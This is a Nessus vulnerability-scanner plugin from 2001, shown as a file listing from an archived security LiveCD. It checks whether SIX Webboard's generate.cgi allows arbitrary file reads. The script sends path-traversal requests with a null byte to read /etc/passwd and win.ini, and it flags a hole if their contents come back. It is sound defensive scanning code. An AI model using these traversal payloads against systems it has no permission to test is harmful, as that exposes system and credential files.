home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / six_webboard.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  137 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10725);
  10.  script_bugtraq_id(3175);
  11.  script_version ("$Revision: 1.13 $");
  12.  script_cve_id("CAN-2001-1115");
  13.  
  14.  
  15.  name["english"] = "SIX Webboard's generate.cgi";
  16.  script_name(english:name["english"]);
  17.  
  18.  desc["english"] = "The CGI 'generate.cgi'from SIX webboard is installed. 
  19. This CGI has a well known security flaw that lets an attacker read 
  20. arbitrary files with the privileges of the http daemon (usually root 
  21. or nobody).
  22.  
  23. Solution : remove it from /cgi-bin
  24.  
  25. Risk factor : High";
  26.  
  27.  
  28.  desc["francais"] = "Le cgi 'generate.cgi' de SIX webboard est installΘ. 
  29. Celui-ci possΦde un problΦme de sΘcuritΘ bien connu qui permet α n'importe 
  30. qui de faire lire des fichiers arbitraires au daemon http, avec les 
  31. privilΦges de celui-ci (root ou nobody). 
  32.  
  33. Solution : retirez-le de /cgi-bin.
  34.  
  35. Facteur de risque : SΘrieux";
  36.  
  37.  
  38.  script_description(english:desc["english"], francais:desc["francais"]);
  39.  
  40.  summary["english"] = "Checks for the presence of /cgi-bin/webboard/generate.cgi";
  41.  summary["francais"] = "VΘrifie la prΘsence de /cgi-bin/webboard/generate.cgi";
  42.  
  43.  script_summary(english:summary["english"], francais:summary["francais"]);
  44.  
  45.  script_category(ACT_GATHER_INFO);
  46.  
  47.  
  48.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
  49.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
  50.  family["english"] = "CGI abuses";
  51.  family["francais"] = "Abus de CGI";
  52.  script_family(english:family["english"], francais:family["francais"]);
  53.  script_dependencie("find_service.nes", "no404.nasl");
  54.  script_require_ports("Services/www", 80);
  55.  exit(0);
  56. }
  57.  
  58. #
  59. # The script code starts here
  60. #
  61.  
  62. include("http_func.inc");
  63. include("http_keepalive.inc");
  64.  
  65. port = get_http_port(default:80);
  66.  
  67. if(!get_port_state(port))exit(0);
  68.  
  69. flag = 0;
  70.  
  71. foreach dir (cgi_dirs())
  72. {
  73.  cgi = string(dir, "/webboard/generate.cgi");
  74.  if(is_cgi_installed_ka(item:cgi, port:port))flag = 1;
  75.  else
  76.  {
  77.  cgi = string(dir, "/generate.cgi");
  78.  if(is_cgi_installed_ka(item:cgi, port:port)){
  79.      flag = 1;
  80.     }
  81.  }
  82. }
  83.  
  84. if(!flag)exit(0);
  85.  
  86.  
  87.  # may need to be improved...
  88.  req = http_get(item:string(dir, "/", cgi,
  89. "?content=../../../../../../etc/passwd%00board=board_1"),
  90.         port:port);
  91.  soc = http_open_socket(port);
  92.  if(soc)
  93.  {
  94.   send(socket:soc, data:req);
  95.   r = http_recv(socket:soc);
  96.   http_close_socket(soc);
  97.   if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))
  98.   {
  99.    security_hole(port);
  100.    exit(0);
  101.   }
  102.  }
  103.   req = http_get(item:string(dir, "/", cgi,
  104. "?content=../../../../../../windows/win.ini%00board=board_1"),
  105.         port:port);
  106.         
  107.  soc = http_open_socket(port);
  108.  if(soc)
  109.  {
  110.   send(socket:soc, data:req);
  111.   r = http_recv(socket:soc);
  112.   http_close_socket(soc);
  113.   if("[windows]" >< r)
  114.   {
  115.    security_hole(port);
  116.    exit(0);
  117.   }
  118.  }
  119.  
  120.  req = http_get(item:string(dir, "/", cgi,
  121. "?content=../../../../../../winnt/win.ini%00board=board_1"),
  122.         port:port);
  123.         
  124.   soc = http_open_socket(port);
  125.  if(soc)
  126.  {
  127.   send(socket:soc, data:req);
  128.   r = http_recv(socket:soc);
  129.   http_close_socket(soc);
  130.   if("[fonts]" >< r)
  131.   {
  132.    security_hole(port);
  133.    exit(0);
  134.   }
  135.  }
  136.  
  137.